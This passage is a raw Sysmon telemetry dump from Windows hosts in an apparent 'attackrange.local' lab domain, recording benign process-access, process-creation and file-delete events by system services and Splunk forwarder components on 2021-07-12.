07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.003{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163DA09201EF03A5C9E0B9E3316BA52D,SHA256=B1426AC95EB753E61F2845E04CE45539EE56B2CD35B5C3123095779A8DCF76AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:28.343{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=8E272919C7DFD9F0FF58586B847AA7EC,SHA256=DE41169BDC49860D550CF89272FF6164FCD0ED618A897CAFED6A40E0539731BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:28.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=408644498C6A540B3573D3EBE9F872C1,SHA256=2977DC0471F5F95F681FF5CAFE02D2A8F849B9DD48E5F530CB5A8843CC0ECA2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.409{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.378{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB1CDB0AB98E932158ECAB7703B20385,SHA256=F9B15124B768C750520ACDF1F876A3BB593CE254F7E0E4F726C81F44BA56FBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:29.878{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B06E73112E21B146DF4D1D93A19D8D,SHA256=12A615EAAE61290CAD23B445953304A6F5414055DDD0DE256E004B19591BECF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:29.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35294E4C234E019B36F4973CC56A4234,SHA256=C9CE4515B41EE1503F7253C22854188F8D96E1459159F5F58D5A8B5B830341B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:29.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADE6DE138ADE1BCFB9101614764CC1F6,SHA256=68FEA7FD45901EA5627BE112C76D58C92D4E3C8B35006EC5A846F1FFC0DBEDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.893{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EB2F9D78452CE1AF5FF46AC24D7DA0,SHA256=28E29A0658D4C97A0869663719E3D8A83AF8A687034DC56EF6D7B514BF656233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:30.159{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CFDD77801488824C6A28CCAA23DD318,SHA256=65C49A81DEF49F51A745662069C6A7F0FF9E47B15E205C422ECA37A24DADE602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.081{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DF6088D9776FD56B0D55B9F0DF70090C,SHA256=CE7871CE32734B3CB43CD91B6ED5DA383F4CA21229848F9AF88101BEFEDDCC3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:31.925{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DE1624049B7E3FD2EB098669A747B75,SHA256=5DAE369576CB029EEF79C493F0B84467EF495171DB4AFC4474604DDFF830DF87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|